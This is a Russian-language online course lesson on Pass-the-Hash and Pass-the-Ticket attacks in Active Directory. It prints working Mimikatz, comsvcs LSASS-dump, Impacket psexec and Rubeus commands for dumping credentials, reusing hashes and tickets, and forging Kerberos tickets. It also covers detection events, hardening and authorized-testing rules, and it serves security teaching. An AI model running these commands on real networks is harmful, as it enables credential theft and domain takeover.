Cyber Security Academy · Урок

Pass-the-Hash и Pass-the-Ticket

Повторное использование украденных учётных данных

Урок 3 из 413 шагов

«Pass-the-Hash и Pass-the-Ticket» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Учетные данные без паролей

Для аутентификации Windows часто не требуется пароль в открытом виде непосредственно в момент использования. И хеши NTLM, и билеты Kerberos могут использоваться самостоятельно. Злоумышленники используют это так: крадут артефакт и повторно используют его.

  • Передача хеша (PtH) повторно использует хеш NTLM.
  • Передача билета (PtT) повторно использует билет Kerberos.
  • Для обоих способов не требуется взламывать пароль.

Где хранятся учетные данные

Во время обычной работы данные учетных записей кэшируются в памяти и на диске. К распространенным источникам относятся:

  • Память процесса LSASS содержит хеши и билеты пользователей, вошедших в систему.
  • База данных SAM хранит хеши локальных учетных записей.
  • NTDS.dit на DC хранит хеши всех доменных учетных записей.
  • Хранилища учетных данных и браузеров, защищенные DPAPI.

Выгрузка данных из LSASS — самый распространенный этап сбора учетных данных.

# Mimikatz: dump logon passwords and hashes
privilege::debug
sekurlsa::logonpasswords

# Comsvcs minidump of lsass (living-off-the-land)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> lsass.dmp full

Механика передачи хеша

Аутентификация NTLM подтверждает знание пароля, используя его хеш как секрет в схеме запрос–ответ. Если у Вас есть хеш, Вы можете завершить рукопожатие, ни разу не узнавая сам пароль.

Поэтому хеш NT является эквивалентом пароля. Любая служба, принимающая NTLM, доступна только по этому хешу.

# Mimikatz pass-the-hash spawns a process with injected creds
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<NThash> /run:cmd.exe

# Impacket psexec via hash
psexec.py -hashes :<NThash> corp.local/Administrator@10.0.0.20

Механика передачи билета

Билеты Kerberos — это токены на предъявителя: тот, у кого есть действительный TGT или TGS, может использовать его до истечения срока действия. Злоумышленники извлекают билеты из LSASS и внедряют их в собственный сеанс.

  • Кража TGT позволяет запрашивать билеты служб от имени этого пользователя.
  • Кража TGS предоставляет доступ к одной конкретной службе.
# Export all tickets, then inject one
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:doIF... (base64 blob)

# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi

Переход от хеша к ключу

Переход от хеша к ключу, также называемый передачей ключа, объединяет NTLM и Kerberos. Вы используете украденный ключ NTLM или AES, чтобы запросить действительный TGT Kerberos, а затем полностью переходите на Kerberos.

Этот способ менее заметен, чем обычная передача хеша, поскольку результирующий трафик выглядит как обычная аутентификация Kerberos.

# Rubeus: turn an NTLM hash into a TGT
Rubeus.exe asktgt /user:svc_sql /rc4:<NThash> /ptt

# AES key is even quieter than RC4
Rubeus.exe asktgt /user:svc_sql /aes256:<key> /ptt

Золотые и серебряные билеты

Получив более глубокий доступ, злоумышленники могут подделывать билеты целиком.

  • Золотой билет — поддельный TGT, подписанный хешем krbtgt. Он позволяет использовать любую идентичность и остается действительным, пока пароль krbtgt не будет изменен дважды.
  • Серебряный билет — поддельный TGS для одной службы, подписанный хешем учетной записи этой службы. Он не обращается к DC, поэтому остается незаметным.
  • Бриллиантовый билет изменяет легитимно выданный TGT, чтобы обойти средства обнаружения поддельных билетов.

Модели перемещения по сети

Повторно используемые учетные данные обеспечивают перемещение по сети. К распространенным каналам выполнения относятся:

  • SMB и создание служб (в стиле psexec).
  • Удаленное создание процессов через WMI.
  • WinRM и удаленное управление PowerShell.
  • Создание экземпляров объектов DCOM.

Один и тот же украденный хеш или билет может открыть доступ ко множеству узлов, где эта учетная запись является локальным администратором.

Почему повторное использование прав локального администратора опасно

Один общий пароль локального администратора на разных машинах — катастрофическая уязвимость. Достаточно извлечь его один раз, чтобы выполнить передачу хеша на каждом узле, где используется этот пароль.

LAPS устраняет проблему, назначая каждой машине уникальный регулярно изменяемый пароль локального администратора и сохраняя его в AD с ограниченным доступом на чтение.

Обнаружение

Эти атаки оставляют телеметрию, если вести соответствующий мониторинг.

  • Тип входа 3 или 9 с использованием NTLM там, где ожидается Kerberos.
  • Событие 4624 с seclogon или необычное использование NTLM привилегированными учетными записями.
  • Аномалии билетов: TGS без предшествующего TGT (серебряный билет) или билеты с необычными сроками действия (золотой билет).
  • Доступ к LSASS из нестандартных процессов (событие Sysmon 10).

Защита

Усиление защиты сосредоточено на безопасности и изоляции учетных данных.

  • Включите защиту учетных данных, чтобы изолировать секреты LSASS в среде VBS.
  • Добавьте конфиденциальные учетные записи в группу Защищенные пользователи (без NTLM и делегирования, с коротким сроком действия билетов).
  • Разверните LAPS и внедрите разделение администраторских уровней, чтобы учетные данные уровня 0 никогда не попадали на рабочие станции.
  • Дважды измените krbtgt при подозрении на компрометацию золотого билета.

Ответственное тестирование

Выгрузка данных из LSASS и подделка билетов — действия с серьезными последствиями. Выполняйте их только при наличии явного разрешения и только на согласованных целях. Не выгружайте данные с рабочих DC, если это не входит в область работ, и после подготовки отчета безопасно уничтожьте собранные хеши и билеты.

Документируйте каждый случай повторного использования учетных данных, чтобы команды защиты могли проверить срабатывание своих средств обнаружения.

Быстрая проверка

Проверьте, насколько хорошо Вы понимаете атаки с повторным использованием учетных данных.

Итоги

Вы увидели, как украденные хеши и билеты полностью обходят необходимость знать пароль.

  • PtH повторно использует хеши NTLM, а PtT — билеты Kerberos.
  • Переход от хеша к ключу преобразует хеш в чистый TGT Kerberos.
  • Золотые, серебряные и бриллиантовые билеты подделываются для закрепления.
  • Защита учетных данных, LAPS, группа «Защищенные пользователи» и изменение krbtgt — основные меры защиты.

Далее: превращение начального доступа в полный контроль над доменом.

Можно начать бесплатно

Изучай Cyber Security Academy с ИИ-репетитором — бесплатно

Пиши и запускай код прямо в браузере, получай мгновенную помощь от ИИ-репетитора 24/7 и продолжи учиться на сайте или в приложении.

Курсы
76
Уроки
303

Часто задаваемые вопросы

Урок «Pass-the-Hash и Pass-the-Ticket» бесплатный?

Да — полный текст урока «Pass-the-Hash и Pass-the-Ticket» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Pass-the-Hash и Pass-the-Ticket»?

Повторное использование украденных учётных данных Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.

Сколько времени занимает урок «Pass-the-Hash и Pass-the-Ticket»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Поверхность атаки Active Directory
  2. Kerberos и атака Kerberoasting
  3. Pass-the-Hash и Pass-the-Ticket
  4. Повышение привилегий и захват домена
← Назад к Cyber Security Academy